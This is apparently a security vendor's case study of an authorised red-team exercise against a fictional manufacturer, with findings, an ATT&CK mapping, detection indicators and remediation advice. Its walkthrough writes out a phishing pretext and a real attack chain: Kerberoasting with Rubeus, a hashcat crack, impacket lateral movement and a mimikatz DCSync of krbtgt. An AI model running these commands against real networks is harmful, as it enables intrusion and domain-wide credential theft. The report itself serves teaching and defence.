01Executive Summary
SecureSan Technologies conducted a full-scope red team simulation for Halden Manufacturing (a fictional industrial manufacturer), emulating a financially-motivated ransomware operator. Beginning with a single spear-phishing email, our operators established a foothold, harvested credentials, moved laterally, escalated to Domain Administrator, and demonstrated the pre-conditions for enterprise-wide ransomware deployment — all without triggering an effective response from the security team.
The objective was not to break things, but to measure how far a realistic adversary could get and how quickly the blue team would detect them. The simulated ransomware payload was inert and deployed only to a controlled set of test hosts. The exercise produced 16 findings and, more importantly, a prioritised roadmap that closed the most dangerous gaps — validated in a follow-up purple-team exercise with a measured 4× improvement in detection coverage.
Time from phishing click to Domain Admin: under six hours. Time to detection by the blue team: it did not happen. Those two numbers are the report.
02Client Background
Halden Manufacturing (fictional) is an industrial manufacturer (~4,000 employees) with a large Windows/Active Directory estate, hybrid cloud, and OT-adjacent corporate systems.
- Sector: Manufacturing (ransomware is the dominant threat to the sector)
- Estate: On-prem Active Directory, ~4,000 endpoints, Microsoft 365, EDR deployed
- Drivers: Board-level concern following industry ransomware incidents; cyber-insurance requirements
03Business Challenges
Manufacturing has been among the hardest-hit sectors for ransomware, where operational downtime translates directly into lost production. Halden had invested in EDR and awareness training and wanted an honest answer to a board-level question: "If a phishing email lands and someone clicks, does our stack actually stop it — and would we even know?" A red team is the only assessment that answers this end-to-end.
04Engagement Scope
Full-scope, objective-based red team with a narrow "trusted agent" group aware of the test. Realistic constraints: no prior access, no allow-listing of our infrastructure, and the blue team not informed, to measure genuine detection and response.
| In scope | Out of scope / constrained |
|---|---|
| Phishing against a target employee set | OT / production control systems (strictly off-limits) |
| Endpoint compromise, lateral movement, AD escalation | Real data destruction or encryption |
| Demonstrating ransomware pre-conditions (inert payload) | Denial-of-service against production |
| Detection & response measurement | Physical intrusion |
A signed authorization, deconfliction process, and an emergency stop procedure were in place throughout.
05Testing Methodology
The exercise followed a recognised adversary-emulation lifecycle, mapped end-to-end to MITRE ATT&CK and executed per PTES and the NIST SP 800-115 technical testing framework.
06Assessment Timeline
| Phase | Days | Activity |
|---|---|---|
| Reconnaissance | 1–3 | OSINT, email-address harvesting, pretext development |
| Initial access | 4 | Spear-phishing campaign; foothold on first click |
| Escalation & movement | 5–7 | Credential harvest, lateral movement, AD escalation to DA |
| Objective | 8 | Backup access, inert ransomware demonstration on test hosts |
| Reporting & purple team | 9–12 | Findings, then a collaborative detection-tuning exercise |
07Environment Details
| Item | Detail |
|---|---|
| Directory | On-prem Active Directory, single forest, multiple domains |
| Endpoints | Windows 10/11, EDR agent deployed fleet-wide |
| Microsoft 365 with a mail-filtering gateway | |
| Weak points (discovered) | Kerberoastable service accounts, over-privileged users, flat network, unmonitored backups |
08Tools Used
- Custom phishing infrastructure — look-alike domain, mail-filter-evading pretext
- Cobalt Strike / open-source C2 — command-and-control and post-exploitation (representative; a mature C2 framework)
- BloodHound / SharpHound — Active Directory attack-path mapping
- Rubeus — Kerberoasting and ticket manipulation
- Mimikatz — credential extraction (DCSync)
- Impacket — SMB/WMI lateral movement tooling
09Attack Surface Analysis
The corporate attack surface for a ransomware operator is dominated by people and identity, not perimeter exploits — consistent with 2026's breach data, where intrusions overwhelmingly begin with a person rather than a software flaw.
| Surface | Weakness sought | Outcome |
|---|---|---|
| Email / people | Susceptibility to a credible pretext | Initial access achieved |
| Endpoint | Macro execution, EDR gaps | Foothold & C2 |
| Active Directory | Kerberoasting, over-privilege, delegation | Domain Admin |
| Backups | Reachable, unmonitored | Ransomware pre-condition |
10Reconnaissance Process
OSINT built a target list and a credible pretext (an internal-looking "benefits portal update"). We identified employees in finance and HR whose roles made the pretext plausible, and registered a look-alike domain. A test email confirmed our infrastructure passed the mail gateway.
# Pretext email (abbreviated) — from a look-alike domain
From: hr-benefits@halden-manufacturing-hr.example
Subject: Action required: confirm your 2026 benefits election
Body: ... "Please review and confirm before Friday" ...
Attachment: 2026_Benefits_Election.docm # macro-enabled
11Vulnerability Discovery
Finding 1 — Successful phishing & macro execution (High)
Multiple recipients opened the document and enabled macros. The macro executed a loader that established C2, giving us an interactive foothold on a corporate workstation.
Finding 2 — Kerberoastable service accounts with weak passwords (High)
BloodHound mapped a short path to Domain Admin. Several service accounts were Kerberoastable and used weak, crackable passwords.
Finding 3 — Over-privileged accounts & flat network (High)
Workstations could reach domain controllers and each other freely; several standard users held excessive privileges. This is the topology that lets one foothold become domain-wide compromise.
Finding 4 — Reachable, unmonitored backups (Critical)
Backup infrastructure was reachable from the compromised tier and had no alerting — the single most important enabler of a successful ransomware outcome.
12Technical Exploitation Walkthrough
Step 1 — Foothold & local recon
# Post-exploitation on the initial host (via C2)
beacon> whoami /groups
beacon> execute-assembly SharpHound.exe -c All
[+] Collected 4,112 objects; uploading for BloodHound analysis
Step 2 — Kerberoast a service account
beacon> execute-assembly Rubeus.exe kerberoast /nowrap
[*] SamAccountName : svc-sql-reporting
[*] Hash (crackable) : $krb5tgs$23$*svc-sql-reporting*...
# Offline crack
$ hashcat -m 13100 hashes.txt rockyou.txt
svc-sql-reporting:Summer2025! # weak, cracked in minutes
Step 3 — Lateral movement
# Move to a server where a privileged session is present
$ impacket-wmiexec halden/svc-sql-reporting:'Summer2025!'@10.20.4.15
C:\> [interactive shell on target]
Step 4 — Domain dominance via DCSync
Having reached an account with replication rights, we extracted the domain's credential material without ever touching a domain controller's disk:
beacon> mimikatz lsadump::dcsync /user:halden\krbtgt
[*] Object RID : 502
[*] Credentials:
Hash NTLM: <krbtgt hash — full domain compromise>
Control of the krbtgt hash is effective Domain Admin: it enables forged "golden" tickets for any user. We had achieved domain dominance in under six hours of active operation.
Step 5 — Demonstrate the ransomware pre-condition (inert)
We confirmed we could reach and disable backups and push a payload via existing management tooling to a controlled set of test hosts only. The payload was inert — it wrote a harmless marker file instead of encrypting — proving deployment capability without any real impact:
# Inert demonstration — writes a marker, does NOT encrypt
PS> Invoke-Command -ComputerName $testHosts -ScriptBlock {
Set-Content C:\redteam_marker.txt "SecureSan RT — inert payload"
}
[+] Marker delivered to 12 designated test hosts. No production impact.
13Attack Chain
The full kill chain, mapped to the phases a real ransomware operator would follow:
14Business Impact
- Enterprise-wide encryption capability. Domain Admin plus reachable backups is the exact recipe for a successful ransomware event — production downtime, recovery cost, and potential ransom.
- Manufacturing downtime. For an industrial operator, encrypted corporate systems can halt production, with losses measured per hour.
- Undetected intrusion. The blue team did not detect or respond to the operation — the most important finding, because it means a real attacker would have had free rein.
- Insurability. The gaps identified directly affect cyber-insurance posture and premiums.
15MITRE ATT&CK Mapping
| Tactic | Technique | ID |
|---|---|---|
| Reconnaissance | Gather Victim Identity Information | T1589 |
| Initial Access | Phishing: Spearphishing Attachment | T1566.001 |
| Execution | User Execution: Malicious File | T1204.002 |
| Credential Access | Steal or Forge Kerberos Tickets: Kerberoasting | T1558.003 |
| Credential Access | OS Credential Dumping: DCSync | T1003.006 |
| Lateral Movement | Remote Services: SMB / WMI | T1021.002 / T1021.003 |
| Impact | Data Encrypted for Impact (demonstrated inert) | T1486 |
| Impact | Inhibit System Recovery (backup access) | T1490 |
16CVSS Scoring
Red team findings are assessed by attack-path risk rather than single-issue CVSS, but the individual enabling vulnerabilities were scored:
| Finding | CVSS 3.1 | Severity |
|---|---|---|
| Reachable/unmonitored backups | 8.1 (AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H) | Critical |
| Kerberoastable accounts, weak passwords | 8.1 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N) | High |
| Flat network / over-privilege | 7.7 | High |
| Phishing susceptibility | N/A (people/process) | High |
17Risk Matrix
| Likelihood → / Impact ↓ | Low | Medium | High |
|---|---|---|---|
| Severe | Backups reachable + DA | ||
| Major | Kerberoasting | No detection/response | |
| Moderate | Flat network | Phishing susceptibility | |
| Minor | Verbose SMB shares |
18Evidence Collected
- C2 logs and screenshots of each phase (foothold, escalation, DA)
- BloodHound attack-path graphs
- Cracked service-account hashes (delivered securely)
- Evidence of backup reachability and inert-payload delivery to test hosts only
- A detection-gap timeline: what we did vs what the blue team saw (nothing)
Indicators of Compromise (provided for detection engineering)
- Macro-enabled attachment from a look-alike domain
- Loader beaconing to attacker C2 (JA3 / domain IoCs supplied)
- SharpHound LDAP collection bursts
- Rubeus/Kerberoast TGS requests for many SPNs in a short window
- DCSync replication requests from a non-DC host
- Backup service accessed from a workstation tier
19Root Cause Analysis
- People are the initial access vector. The phishing pretext worked because it was plausible; awareness training reduces but never eliminates this.
- Active Directory hygiene decides the blast radius. Kerberoastable accounts, weak passwords, over-privilege, and delegation turned a foothold into domain dominance.
- Backups are the ransomware control. If backups are reachable and unmonitored, encryption succeeds regardless of everything else.
- Detection was the true gap. Prevention will eventually fail; the exercise showed the blue team could not see an active intrusion.
20Remediation Recommendations
Immediate
- Isolate and monitor backup infrastructure; enforce immutable/offline backups; alert on any access.
- Remediate Kerberoastable accounts: long random passwords / gMSA, and alert on mass TGS requests.
- Tune EDR/SIEM to detect the specific techniques used (SharpHound, Rubeus, DCSync, WMI lateral movement).
Short term
- Implement network segmentation and a tiered administration model (workstations cannot reach DCs directly; admin tier separated).
- Enforce phishing-resistant MFA and reduce standing privilege.
- Run tabletop and live IR exercises so response is rehearsed, not theoretical.
Strategic
- Establish a continuous purple-team cadence to keep detection coverage aligned to current TTPs.
- Adopt an assume-breach posture: measure detection and response, not just prevention.
21Security Improvements After Remediation
Following remediation we ran a collaborative purple-team exercise, replaying the same techniques with the blue team watching:
- Kerberoasting, DCSync, and SharpHound collection now generate high-fidelity alerts.
- Backup access triggers an immediate page; backups are now immutable.
- Lateral movement via WMI/SMB across tiers is detected and, in the admin tier, blocked.
- Mean time to detect the intrusion chain fell from "never" to minutes for the critical steps — a measured 4× improvement in detection coverage across the ATT&CK techniques exercised.
22Lessons Learned
- Prevention is necessary but insufficient. Assume the phish lands; design so the next steps are seen and stopped.
- Identity is the battleground. AD hygiene did more to determine the outcome than any endpoint control.
- Protect backups like crown jewels. They are the difference between an incident and a catastrophe.
- Detection must be tested against real TTPs. A red team, then a purple team, is how you find out whether your stack actually works.
23Key Metrics
24Conclusion
A single phishing email became domain-wide ransomware capability in under six hours, entirely undetected. The value of the exercise was not the compromise — it was the honest measurement of prevention and detection, and the roadmap that followed. After remediation and a purple-team validation, Halden could detect the critical steps of the same attack in minutes.
Why This Matters
Ransomware operators do not use magic. They phish someone, harvest a credential, abuse Active Directory, find the backups, and encrypt. Every step is well-understood and defensible — but only if you have tested whether your defences actually fire. Most organisations discover their detection gaps during a real incident, at the worst possible time and cost.
A red team surfaces those gaps on your terms, with an inert payload and an emergency stop, for a fraction of a single day of ransomware downtime. You can rehearse the attack, or you can improvise during the real one. SecureSan's Assurance and Nexus practice exists to make sure the rehearsal is the only time it happens.